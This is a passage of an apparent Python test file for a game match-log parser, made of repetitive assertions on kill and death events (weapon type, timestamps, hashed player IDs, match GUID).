assert e[7]['DATA']['KILLER']['BOT'] is None # noqa
assert e[7]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[7]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[7]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[7]['DATA']['KILLER']['NAME'] is None # noqa
assert e[7]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[7]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[7]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[7]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[7]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[7]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[7]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[7]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[7]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[7]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[7]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[7]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[7]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[7]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[7]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[7]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[7]['DATA']['ROUND'] is None # noqa
assert e[7]['DATA']['SUICIDE'] is None # noqa
assert e[7]['DATA']['TEAMKILL'] is None # noqa
assert e[7]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[7]['DATA']['TEAM_DEAD'] is None # noqa
assert e[7]['DATA']['TIME'] == 15.7 # noqa
assert e[7]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[7]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[7]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[7]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[7]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[7]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[7]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[7]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[7]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[7]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[7]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[7]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[7]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[7]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[7]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[7]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[7]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[7]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[7]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[7]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[7]['DATA']['WARMUP'] == False # noqa
assert e[7]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[8]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[8]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[8]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[8]['DATA']['KILLER']['BOT'] is None # noqa
assert e[8]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[8]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[8]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[8]['DATA']['KILLER']['NAME'] is None # noqa
assert e[8]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[8]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[8]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[8]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[8]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[8]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[8]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[8]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[8]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[8]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[8]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[8]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[8]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[8]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[8]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[8]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[8]['DATA']['ROUND'] is None # noqa
assert e[8]['DATA']['SUICIDE'] is None # noqa
assert e[8]['DATA']['TEAMKILL'] is None # noqa
assert e[8]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[8]['DATA']['TEAM_DEAD'] is None # noqa
assert e[8]['DATA']['TIME'] == 15.7 # noqa
assert e[8]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[8]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[8]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[8]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[8]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[8]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[8]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[8]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[8]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[8]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[8]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[8]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[8]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[8]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[8]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[8]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[8]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[8]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[8]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[8]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[8]['DATA']['WARMUP'] == False # noqa
assert e[8]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[9]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[9]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[9]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[9]['DATA']['KILLER']['BOT'] is None # noqa
assert e[9]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[9]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[9]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[9]['DATA']['KILLER']['NAME'] is None # noqa
assert e[9]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[9]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[9]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[9]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[9]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[9]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[9]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[9]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[9]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[9]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[9]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[9]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[9]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[9]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[9]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[9]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[9]['DATA']['ROUND'] is None # noqa
assert e[9]['DATA']['SUICIDE'] is None # noqa
assert e[9]['DATA']['TEAMKILL'] is None # noqa
assert e[9]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[9]['DATA']['TEAM_DEAD'] is None # noqa
assert e[9]['DATA']['TIME'] == 27.9 # noqa
assert e[9]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[9]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[9]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[9]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[9]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[9]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[9]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[9]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[9]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[9]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[9]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[9]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[9]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[9]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[9]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[9]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[9]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[9]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[9]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[9]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[9]['DATA']['WARMUP'] == False # noqa
assert e[9]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[10]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[10]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[10]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[10]['DATA']['KILLER']['BOT'] is None # noqa
assert e[10]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[10]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[10]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[10]['DATA']['KILLER']['NAME'] is None # noqa
assert e[10]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[10]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[10]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[10]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[10]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[10]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[10]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[10]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[10]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[10]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[10]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[10]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[10]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[10]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[10]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[10]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[10]['DATA']['ROUND'] is None # noqa
assert e[10]['DATA']['SUICIDE'] is None # noqa
assert e[10]['DATA']['TEAMKILL'] is None # noqa
assert e[10]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[10]['DATA']['TEAM_DEAD'] is None # noqa
assert e[10]['DATA']['TIME'] == 27.9 # noqa
assert e[10]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[10]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[10]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[10]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[10]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[10]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[10]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[10]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[10]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[10]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[10]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[10]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[10]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[10]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[10]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[10]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[10]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[10]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[10]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[10]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[10]['DATA']['WARMUP'] == False # noqa
assert e[10]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[11]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[11]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[11]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[11]['DATA']['KILLER']['BOT'] is None # noqa
assert e[11]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[11]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[11]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[11]['DATA']['KILLER']['NAME'] is None # noqa
assert e[11]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[11]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[11]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[11]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[11]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[11]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[11]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[11]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[11]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[11]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[11]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[11]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[11]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[11]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[11]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[11]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[11]['DATA']['ROUND'] is None # noqa
assert e[11]['DATA']['SUICIDE'] is None # noqa
assert e[11]['DATA']['TEAMKILL'] is None # noqa
assert e[11]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[11]['DATA']['TEAM_DEAD'] is None # noqa
assert e[11]['DATA']['TIME'] == 41.6 # noqa
assert e[11]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[11]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[11]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[11]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[11]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[11]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[11]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[11]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[11]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[11]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[11]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[11]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[11]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[11]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[11]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[11]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[11]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[11]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[11]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[11]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[11]['DATA']['WARMUP'] == False # noqa
assert e[11]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[12]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[12]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[12]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[12]['DATA']['KILLER']['BOT'] is None # noqa
assert e[12]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[12]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[12]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[12]['DATA']['KILLER']['NAME'] is None # noqa
assert e[12]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[12]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[12]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[12]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[12]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[12]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[12]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[12]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[12]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[12]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[12]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[12]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[12]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[12]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[12]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[12]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[12]['DATA']['ROUND'] is None # noqa
assert e[12]['DATA']['SUICIDE'] is None # noqa
assert e[12]['DATA']['TEAMKILL'] is None # noqa
assert e[12]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[12]['DATA']['TEAM_DEAD'] is None # noqa
assert e[12]['DATA']['TIME'] == 41.6 # noqa
assert e[12]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[12]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[12]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[12]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[12]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[12]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[12]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[12]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[12]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[12]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[12]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[12]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[12]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[12]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[12]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[12]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[12]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[12]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[12]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[12]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[12]['DATA']['WARMUP'] == False # noqa
assert e[12]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[13]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[13]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[13]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[13]['DATA']['KILLER']['BOT'] is None # noqa
assert e[13]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[13]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[13]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[13]['DATA']['KILLER']['NAME'] is None # noqa
assert e[13]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[13]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[13]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[13]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[13]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[13]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[13]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[13]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[13]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[13]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[13]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[13]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[13]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[13]['DATA']['MOD'] == 'PLASMA' # noqa
assert e[13]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[13]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[13]['DATA']['ROUND'] is None # noqa
assert e[13]['DATA']['SUICIDE'] is None # noqa
assert e[13]['DATA']['TEAMKILL'] is None # noqa
assert e[13]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[13]['DATA']['TEAM_DEAD'] is None # noqa
assert e[13]['DATA']['TIME'] == 53.9 # noqa
assert e[13]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[13]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[13]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[13]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[13]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[13]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[13]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[13]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[13]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[13]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[13]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[13]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[13]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[13]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[13]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[13]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[13]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[13]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[13]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[13]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[13]['DATA']['WARMUP'] == False # noqa
assert e[13]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[14]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[14]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[14]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[14]['DATA']['KILLER']['BOT'] is None # noqa
assert e[14]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[14]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[14]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[14]['DATA']['KILLER']['NAME'] is None # noqa
assert e[14]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[14]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[14]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[14]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[14]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[14]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[14]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[14]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[14]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[14]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[14]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[14]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[14]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[14]['DATA']['MOD'] == 'PLASMA' # noqa
assert e[14]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[14]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[14]['DATA']['ROUND'] is None # noqa
assert e[14]['DATA']['SUICIDE'] is None # noqa
assert e[14]['DATA']['TEAMKILL'] is None # noqa
assert e[14]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[14]['DATA']['TEAM_DEAD'] is None # noqa
assert e[14]['DATA']['TIME'] == 53.9 # noqa
assert e[14]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[14]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[14]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[14]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[14]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[14]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[14]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[14]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[14]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[14]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[14]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[14]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[14]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[14]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[14]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[14]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[14]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[14]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[14]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[14]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[14]['DATA']['WARMUP'] == False # noqa
assert e[14]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[15]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[15]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[15]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[15]['DATA']['KILLER']['BOT'] is None # noqa
assert e[15]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[15]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[15]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[15]['DATA']['KILLER']['NAME'] is None # noqa
assert e[15]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[15]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[15]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[15]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[15]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[15]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[15]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[15]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[15]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[15]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[15]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[15]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[15]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[15]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[15]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[15]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[15]['DATA']['ROUND'] is None # noqa
assert e[15]['DATA']['SUICIDE'] is None # noqa
assert e[15]['DATA']['TEAMKILL'] is None # noqa
assert e[15]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[15]['DATA']['TEAM_DEAD'] is None # noqa
assert e[15]['DATA']['TIME'] == 55.6 # noqa
